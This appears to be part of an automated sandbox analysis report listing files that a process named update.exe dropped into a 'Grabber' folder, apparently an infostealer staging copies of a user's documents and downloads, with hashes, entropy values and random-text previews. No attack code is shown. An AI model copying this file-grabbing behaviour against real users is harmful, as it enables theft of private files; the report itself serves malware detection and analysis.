                                                  SSDEEP:24:NCzz4hMQMxH70HULgnraTryj1S0KEX64u+O572j79DwzpnQf8A:axH70cauYS0k4u+O125wtnm8A
                                                  MD5:DD71B9C0322AD45992E56A9BCE43FE82
                                                  SHA1:60945B6BC3027451A2E1CFA29D263A994F50E91A
                                                  SHA-256:19AC62FD471E562088365029F7B0672623511CF3E58F2EF6DE1A15C14A2E94E7
                                                  SHA-512:86EA2B42FEB542977FCF534B4708F7A07E09F4ACC413307E660B905408BC4AA9E26C50E907FA02379EA3EBFD18C532CC9DC269B6EA5994E3290082E429CAAE03
                                                  Malicious:false
                                                  Preview:EOWRVPQCCSGUYRPSSKREBPXVQXUWKHGDIJHLBLYMXTIUESLNTSFMRJGDSQHOWECQAJMENKQNNWPVETUPWMXJTCUIAKPCZEENXVLTKYPKROZPDEBFNAJOVCNEXQJFUHQCMLNHGMRJJIPLOMWFWJKKXSTRHWFVLVQPEMFBLDTSCCSXADJIIDQIYCEGSDEDZDWUEJLTYJHMYEHHMBFZCRDHXZVPESWNDGUEFQZTJFSJVKZMWREMIZGAIZANQJKWWXITTXHDQDZOEOGKCEMDUUBDTMNWBRSOWEKQXQDCYJXERQRAMVQCWCTYJPEAJUAWNBRQWGFJAHXJJFRYTZMSGCREPRECKHXXMJGSQEKUCUNCWUAAPBWQVSMWCJGYSLPHJJHJGXSMNLNICJMSGSWRKARHMQXLYSAOPDAPXSMORZLUWYOQTJQNKSCAJWRUEYRFPNOVSMNYRKMTSGRIFLOAJUGJYDTLINOTCEADKRENVYNODFSIJGSDCICIDXZTLLSKKJQSOHYTZRBSHPHXWZOOSKQIRSGPTAOQPBVJAMXOGPYNJMJXAKCTMRRTFCBPOAMNJORWRNZOGZMNBVCCZYQPOQOUXBGKNLFSQWAWEREFQBRDLTVHEFNRUSOARHJPRECDRMPANZRBGCANIUWEBUDVWLYHFTPGBHSZBZBEFUWFHUZPJOVMHGSINZWDUKWPGMGSNSSJNOMETOCJILXRQRGZQFAJCWYQEENIZIMHRBTZUYEOKCQXYLWCKFHOHCOVRVPNTEUARVJEFALBUVYXIYZRMGJWZNYNLPYHZSSCODVXZBIWXIOAVMGMPKCPYIFZIKWRIHNIYASXZLMOLNZOMMYUSCRZBCXRANWWODLPHCXXDPLNYLMHYIUYZJWQLECFNXQEERYDVDBPXOLGZLZQCVYUYKFZGKXWVDQANPXQYAATYFJALGENVLDMHDASWKNNXODUHLXYGCBUKEFWISCCUWXNUNETWMTQHQDJMAXNPFPLMPQO

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\GRXZDKKVDB.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.697358951122591
                                                  Encrypted:false
                                                  SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                                                  MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                                                  SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                                                  SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                                                  SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                                                  Malicious:false
                                                  Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\NVWZAPQSQL.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6998645060098685
                                                  Encrypted:false
                                                  SSDEEP:24:FzrJLVfPTlXwAGfwXz0vRDC0aYECjYTixDXXwDyDFdJCSuHFF03T:FRLVHTlXwAGEoVCRYF0EDXgDVFHUj
                                                  MD5:1676F91570425F6566A5746BC8E8427E
                                                  SHA1:0F922133E2BEF0B48C623BEFA0C77361F6FA3900
                                                  SHA-256:534233540B43C2A72D09DBF93858ECD7B5F48376B69182EDBCA9983409F21C87
                                                  SHA-512:07D3CA8902964865FE9909054CF90DA1852678FBE58B1C0A8C2DBA2359A16DCBD43F23142D957DB9C1A8C2A1811EF4FEA74B0016A6F469538366B4FF01C8A146
                                                  Malicious:false
                                                  Preview:NVWZAPQSQLDLCZFLTMOWSKLFWOMMGYWWTZSPFFTDRHOTSSRKDGSJCIGMJJNKHMSAEMKBPGYCFVANNLUHHUMQOHINWJABNFIWWWZXJLCANQSKWMIWKPMVTCWFUMQBAGWZRWHRCMJDSNPGGGNECNQGPIZXLBIMLXMHDDXDKVYPEKRCNITDGJJNAEAATOVDDPBUDYWRPDYWARJTFXBUUZABBVURIWKONIVMPCYVUBTOTCIJJVRWYUNYHAFJZUMVTOIXZGAVVNSRENTVPHFLSLFWBLPFQDMQCJIHRXSQOTPSPDZKXCRBHZXDQIECBJTNIRGCACNADPHRWIVAWGPANEMHGPPPARWYWAOAHPWQLEGOBGVNWVBIFLAEOZYELRFOEZQCQIXCQBUKZGPOQFLHFLCFTYWBDGCWMDWICTICWVZEAQNJOOVCGQZYTBBXQPEYFQMSMETMKKZMRGXXLCDXDEEEJKZAUNEWZONYMVVIZOWQRUQYNOEFMWEVWXFAZRHGHUXGAYODAXDNQONZPVBKRYIOLZJIYSHJSCEPYVMYISKJIWPKVGUQBNLZCUFGXBFZDDRGUMCLJGJPDAZKZLRMDSBFEJQYNNKTHBMJMUHVUOIVZRULJFFYIUMOHUGCJUYZGXKXNIWZUKRIYDZATEOXGMHUPOOBIHEEVPKQEZDDWJHKEKLNTMWMDCFDOYCCDOERYFZNFUDEHYXIBQAVVOHQNIEWZODOFZDFJSWYCJMWWOIZSCZSZBGOIFHRDBXHKMCCLSYNVVXYLWKXEKVHIZEBIBHWMXDXEGZDYWRROMYHTDQVCLXOGVHWHFNIDZOXWTTPAMAKJIYLNQIEDSCCTSBLPHTTGLCIYXXWIBXAGYBACOKOTPPBKACWQBYRTKFMCSSRYQNESLPTLSLCWCSLHOGHNCGUFWMYXDBUFSOKFIDUIBHTQJFIQTVZZVIZEWTBSHJWKQXGUWLFKNDUSKPDSMJNJJNEEOWEHOKTNZWRDNOXWJEK

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\NVWZAPQSQL\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\PALRGUCVEH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696508269038202
                                                  Encrypted:false
                                                  SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                                                  MD5:0E9E92228B27AD7E7B4449467A529B0C
                                                  SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                                                  SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                                                  SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                                                  Malicious:false
                                                  Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.pdf

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.6959554225029665
                                                  Encrypted:false
                                                  SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                  MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                  SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                  SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                  SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                  Malicious:false
                                                  Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):402
                                                  Entropy (8bit):3.493087299556618
                                                  Encrypted:false
                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                  MD5:ECF88F261853FE08D58E2E903220DA14
                                                  SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                  SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                  SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                  Malicious:false
                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\BJZFPPWAPT.png

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.704346314649071
                                                  Encrypted:false
                                                  SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                  MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                  SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                  SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                  SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                  Malicious:false
                                                  Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EEGWXUHVUG.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.690299109915258
                                                  Encrypted:false
                                                  SSDEEP:24:0C2jKPS/GeHBPaNDdBKW/PXAx+sTTqBVw8tk7LI/csnfv:UWKPaNjKW/PwxfTixkY/cSfv
                                                  MD5:F0D9DE697149ECBC1D88C7EA4841E5BD
                                                  SHA1:06A2A47C12B3554397AA0C8F483411CAB366947D
                                                  SHA-256:5BE0708B77E41FC490ECEC9CDFF20C9479FC857E47CC276D6F68C0895EA68FB2
                                                  SHA-512:E9953E00241C3FB48E267F1A49E2C53FEE4240415C7A48FAD089742C6C4AA1C5A9CCFEE616FC91EB29C1C8252A3095163A515ABA96A1F0B41A8B129929696917
                                                  Malicious:false
                                                  Preview:EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

                                                  C:\Users\user\AppData\Local\5527a070a4b53be4cbed7973ae6e90c7\user@936905_en-CH\Grabber\DRIVE-C\Users\user\Downloads\EFOYFBOLXA.docx

                                                  Download File
                                                  Process:C:\Users\user\AppData\Roaming\update.exe
                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):4.696178193607948
                                                  Encrypted:false
                                                  SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                  MD5:960ECA5919CC00E1B4542A6E039F413E
                                                  SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                  SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                  SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                  Malicious:false
